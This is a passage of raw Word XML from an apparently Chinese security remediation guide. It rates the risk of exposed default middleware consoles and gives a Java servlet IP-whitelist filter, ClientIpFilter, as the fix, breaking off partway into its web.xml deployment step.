        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>高危</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00BC501F" w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可访问默认中间件控制台，且能过成功获取</w:t>
      </w:r>
      <w:r w:rsidR="00BC501F" w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> shell</w:t>
      </w:r>
      <w:r w:rsidR="00BC501F" w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572DBD3D" w14:textId="1938193A" w:rsidR="0060402F" w:rsidRPr="00215B4A" w:rsidRDefault="0060402F" w:rsidP="00215B4A">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>中危</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00881273" w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可访问默认中间件控制台，并成功登录，但无法获取</w:t>
      </w:r>
      <w:r w:rsidR="00881273" w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> shell</w:t>
      </w:r>
      <w:r w:rsidR="00881273" w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71726E2F" w14:textId="7D123DE0" w:rsidR="0060402F" w:rsidRPr="00215B4A" w:rsidRDefault="0060402F" w:rsidP="00215B4A">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>低危</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00881273" w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可访问默认中间件控制台，但无法登录且无法执行危险操作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303346EA" w14:textId="77777777" w:rsidR="00BD3279" w:rsidRPr="00215B4A" w:rsidRDefault="00757422" w:rsidP="00215B4A">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>修复方案：</w:t>
      </w:r>
      <w:r w:rsidR="00BD3279" w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>默认的</w:t>
      </w:r>
      <w:r w:rsidR="00BD3279" w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidR="00BD3279" w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>容器控制台泄漏于网络中，常常可被利用，进行对</w:t>
      </w:r>
      <w:r w:rsidR="00BD3279" w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidR="00BD3279" w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统的攻击，一旦进入这些控制台后，可对网站进行任意的部署，中断服务等危险行为，建议从以下几点出发，修复有关控制台地址泄漏的问题：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A343A20" w14:textId="77777777" w:rsidR="00BD3279" w:rsidRPr="00215B4A" w:rsidRDefault="00BD3279" w:rsidP="00215B4A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对于必须暴露于公网或者其他网络中的控制台地址，则为其地址做访问白名单措施，即只允许白名单以内的用户</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址可以访问到该控制台，通过过滤器（</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>filter</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）实现：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A6C388" w14:textId="77777777" w:rsidR="00BD3279" w:rsidRPr="00215B4A" w:rsidRDefault="00BD3279" w:rsidP="00215B4A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建客户端</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>过滤器</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ClientIpFilter</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="128"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8222"/>
      </w:tblGrid>
      <w:tr w:rsidR="00785C29" w:rsidRPr="00785C29" w14:paraId="00799A05" w14:textId="77777777" w:rsidTr="00785C29">
        <w:trPr>
          <w:trHeight w:val="299"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8222" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="18A7ED15"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package com.huawei.filters;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D3F0CB4"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import java.io.IOException;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76D74511"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import javax.servlet.FilterChain;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B81A685"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import javax.servlet.ServletRequest;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77DE1434"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import javax.servlet.ServletResponse;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DBA1191"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import javax.servlet.Filter;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0640B920"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import javax.servlet.ServletException;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C0AC51B" w14:textId="77777777" w:rsidR="00BD3279" w:rsidRPr="00785C29" w:rsidRDefault="00BD3279" w:rsidP="00785C29">
            <w:pPr>
              <w:pStyle w:val="ae"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:snapToGrid w:val="0"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00785C29">
              <w:rPr>
                <w:snapToGrid w:val="0"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>import javax.servlet.FilterConfig;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44389DC3"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public class ClientIpFilter implements Filter</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B090C8B"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w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35330E02"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protected FilterConfig filterConfig;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02AD3095"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private String whiteIPlist[] = null;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="492D6D0A"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public void doFilter(ServletRequest req, ServletResponse res, FilterChain chain)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6EBCF937"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throws IOException, ServletException</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62B1A8FE"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54ACF569"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String clientIP = req.getRemoteAddr();        </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A4F8E85"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if(IsIPinWhitelist(clientIP))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="291B41D6"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t>{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15B96717" w14:textId="77777777" w:rsidR="00BD3279" w:rsidRPr="00785C29" w:rsidRDefault="00BD3279" w:rsidP="00785C29">
            <w:pPr>
              <w:pStyle w:val="ae"/>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t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00785C29">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:snapToGrid w:val="0"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:tab/>
              <w:t>//</w:t>
            </w:r>
            <w:r w:rsidRPr="00785C29">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:snapToGrid w:val="0"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>验证成功，继续处理</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04B4A79D" w14:textId="77777777" w:rsidR="00BD3279" w:rsidRPr="00785C29" w:rsidRDefault="00BD3279" w:rsidP="00785C29">
            <w:pPr>
              <w:pStyle w:val="ae"/>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r>
            <w:r w:rsidRPr="00785C29">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:snapToGrid w:val="0"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:tab/>
              <w:t>//System.out.println(clientIP+"</w:t>
            </w:r>
            <w:r w:rsidRPr="00785C29">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:snapToGrid w:val="0"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>调用</w:t>
            </w:r>
            <w:r w:rsidRPr="00785C29">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:snapToGrid w:val="0"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>Web Service</w:t>
            </w:r>
            <w:r w:rsidRPr="00785C29">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:snapToGrid w:val="0"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00785C29">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:snapToGrid w:val="0"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>IP</w:t>
            </w:r>
            <w:r w:rsidRPr="00785C29">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:snapToGrid w:val="0"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>鉴权通过</w:t>
            </w:r>
            <w:r w:rsidRPr="00785C29">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:snapToGrid w:val="0"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>");</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="218EE5BD"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chain.doFilter(req,res);</w:t>
            </w:r>
            <w:r w:rsidRPr="00785C29">
              <w:rPr>
                <w:snapToGrid w:val="0"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00785C29">
              <w:rPr>
                <w:snapToGrid w:val="0"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:tab/>
            </w:r>
          </w:p>
          <w:p w14:paraId="021043E1"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t>}</w:t>
            </w:r>
            <w:r w:rsidRPr="00785C29">
              <w:rPr>
                <w:snapToGrid w:val="0"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00785C29">
              <w:rPr>
                <w:snapToGrid w:val="0"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:tab/>
            </w:r>
          </w:p>
          <w:p w14:paraId="4508B567"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t>else</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A23FFC4"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t>{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="521800C2" w14:textId="77777777" w:rsidR="00BD3279" w:rsidRPr="00785C29" w:rsidRDefault="00BD3279" w:rsidP="00785C29">
            <w:pPr>
              <w:pStyle w:val="ae"/>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r>
            <w:r w:rsidRPr="00785C29">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:snapToGrid w:val="0"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:tab/>
              <w:t>//</w:t>
            </w:r>
            <w:r w:rsidRPr="00785C29">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:snapToGrid w:val="0"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>验证不成功，禁止用户调用该服务。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DE1E45F" w14:textId="77777777" w:rsidR="00BD3279" w:rsidRPr="00785C29" w:rsidRDefault="00BD3279" w:rsidP="00785C29">
            <w:pPr>
              <w:pStyle w:val="ae"/>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r>
            <w:r w:rsidRPr="00785C29">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:snapToGrid w:val="0"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:tab/>
              <w:t>System.out.println(clientIP+"</w:t>
            </w:r>
            <w:r w:rsidRPr="00785C29">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:snapToGrid w:val="0"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>调用</w:t>
            </w:r>
            <w:r w:rsidRPr="00785C29">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:snapToGrid w:val="0"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>Web Service</w:t>
            </w:r>
            <w:r w:rsidRPr="00785C29">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:snapToGrid w:val="0"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00785C29">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:snapToGrid w:val="0"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>IP</w:t>
            </w:r>
            <w:r w:rsidRPr="00785C29">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:snapToGrid w:val="0"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>鉴权不通过</w:t>
            </w:r>
            <w:r w:rsidRPr="00785C29">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:snapToGrid w:val="0"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>");</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E02FECE" w14:textId="77777777" w:rsidR="00BD3279" w:rsidRPr="00785C29" w:rsidRDefault="00BD3279" w:rsidP="00785C29">
            <w:pPr>
              <w:pStyle w:val="ae"/>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t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00785C29">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:snapToGrid w:val="0"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:tab/>
              <w:t>//throw new ServletException(clientIP + "</w:t>
            </w:r>
            <w:r w:rsidRPr="00785C29">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:snapToGrid w:val="0"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>无权限访问</w:t>
            </w:r>
            <w:r w:rsidRPr="00785C29">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:snapToGrid w:val="0"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>Web Service</w:t>
            </w:r>
            <w:r w:rsidRPr="00785C29">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:snapToGrid w:val="0"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>！</w:t>
            </w:r>
            <w:r w:rsidRPr="00785C29">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:snapToGrid w:val="0"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>");</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33F60D10"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t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="015FEBB1"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    </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57E1A6B6"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t>private boolean IsIPinWhitelist(String remoteIPAddress)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06C583EA"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t>{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6262673F"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t>for(int i = 0; i &lt; this.whiteIPlist.length; i++)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="741FC169"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014BDE12"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String strIP = this.whiteIPlist[i];</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56931501"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if(strIP.equals(remoteIPAddress))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6399B79B"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w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B259E5C"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r>
            <w:r w:rsidRPr="00785C29">
              <w:rPr>
                <w:snapToGrid w:val="0"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:tab/>
              <w:t>return true;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D38FC3A"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w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E30F783"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r w:rsidRPr="00785C29">
              <w:rPr>
                <w:snapToGrid w:val="0"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00785C29">
              <w:rPr>
                <w:snapToGrid w:val="0"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:tab/>
            </w:r>
          </w:p>
          <w:p w14:paraId="17945082" w14:textId="77777777" w:rsidR="00BD3279" w:rsidRPr="00785C29" w:rsidRDefault="00BD3279" w:rsidP="00785C29">
            <w:pPr>
              <w:pStyle w:val="ae"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:snapToGrid w:val="0"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00785C29">
              <w:rPr>
                <w:snapToGrid w:val="0"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00785C29">
              <w:rPr>
                <w:snapToGrid w:val="0"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:tab/>
              <w:t>return false;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FE13EA1"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t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F2C7130"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ab/>
              <w:t>public void setFilterConfig(FilterConfig filterConfig)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16FF4250"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599FC4E9"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this.filterConfig = filterConfig;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61521448"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24E0EEBE"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public void destroy()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6433A7AB"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2CB43140"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filterConfig = null;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17D22DD5"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75350617"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public void init(FilterConfig config)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E3785A9"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throws ServletException</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="030F6E0E"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01FDB168"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this.filterConfig = config;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C8B9D99"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String IPs = config.getInitParameter("IPList");</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1329FDFA"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this.whiteIPlist = IPs.split(",");</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D011458" w14:textId="77777777" w:rsidR="00BD3279" w:rsidRPr="00785C29" w:rsidRDefault="00BD3279" w:rsidP="00785C29">
            <w:pPr>
              <w:pStyle w:val="ae"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:snapToGrid w:val="0"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00785C29">
              <w:rPr>
                <w:snapToGrid w:val="0"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t xml:space="preserve">    }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D765A79" w14:textId="77777777" w:rsidR="00BD3279" w:rsidRPr="00785C29" w:rsidRDefault="00BD3279" w:rsidP="00785C29">
            <w:pPr>
              <w:pStyle w:val="ae"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:b/>
                <w:snapToGrid w:val="0"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00785C29">
              <w:rPr>
                <w:snapToGrid w:val="0"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="54165EEC" w14:textId="77777777" w:rsidR="00BD3279" w:rsidRPr="00215B4A" w:rsidRDefault="00BD3279" w:rsidP="00215B4A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>web.xml</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中部署过滤器</w:t>
      </w:r>
      <w:r w:rsidRPr="00215B4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ClientIpFilter</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="8273" w:type="dxa"/>
        <w:tblInd w:w="1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73"/>
      </w:tblGrid>
      <w:tr w:rsidR="006A59A0" w:rsidRPr="00215B4A" w14:paraId="675DCA12" w14:textId="77777777" w:rsidTr="006A59A0">
        <w:trPr>
          <w:trHeight w:val="299"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8273" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="79446AE9"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hint="eastAsia"/>
              </w:rPr>
              <w:t>在对应的</w:t>
            </w:r>
            <w:r w:rsidRPr="00215B4A">
              <w:rPr>
